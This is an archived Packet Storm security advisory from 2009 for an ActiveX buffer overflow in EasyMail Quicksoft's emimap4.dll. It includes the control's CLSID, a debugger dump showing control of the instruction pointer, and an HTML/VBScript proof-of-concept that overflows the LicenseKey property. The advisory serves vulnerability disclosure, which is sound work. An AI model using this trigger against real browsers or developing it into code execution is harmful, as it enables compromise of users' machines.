EasyMail Quicksoft 6.0.2.0 Code Execution

2009-09-16T00:00:00
ID PACKETSTORM:81353
Type packetstorm
Reporter Francis Provencher
Modified 2009-09-16T00:00:00

Description

                                        
                                            `#####################################################################################  
  
Application: EasyMail Quicksoft 6.0.2.0  
  
Platforms: Windows XP Professional French SP2  
  
crash: IE 6.0.2900.2180  
  
  
Exploitation: remote Code Execution  
  
Date: 2009-08-24  
  
Author: Francis Provencher (Protek Research Lab's)  
  
  
#####################################################################################  
  
1) Introduction  
2) Technical details and bug  
3) The Code  
  
#####################################################################################  
  
===============  
1) Introduction  
===============  
  
Create, send, download, parse, print and store internet email messages in your classic windows application. Designed for Visual Basic, ASP, C++, Delphi, ColdFusion, PowerBuilder, Access and other development environments. COM or standard DLL interfaces. This is the software that processes hundreds of millions of email messages on the Internet every day.  
  
#####################################################################################  
  
============================  
2) Technical details   
============================  
  
Name: emimap4.dll  
Ver.: 6.0.2.0  
CLSID: {0CEA3FB1-7F88-4803-AA8E-AD021566955D}  
  
ModLoad: 037f0000 0381e000 C:\WINDOWS\system32\emimap4.dll  
(2088.2388): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c  
eip=41414141 esp=0012df88 ebp=41414141 iopl=0 nv up ei pl zr na pe nc  
  
  
  
  
  
#####################################################################################  
  
===========  
3) The Code  
===========  
  
Proof of concept DoS code;  
  
<HTML>  
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object>  
<script language = 'vbscript'>  
  
  
  
Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")  
  
  
code = Scrap  
  
  
target.LicenseKey = code  
  
  
</script>  
<html>  
~  
  
  
  
#####################################################################################  
  
  
`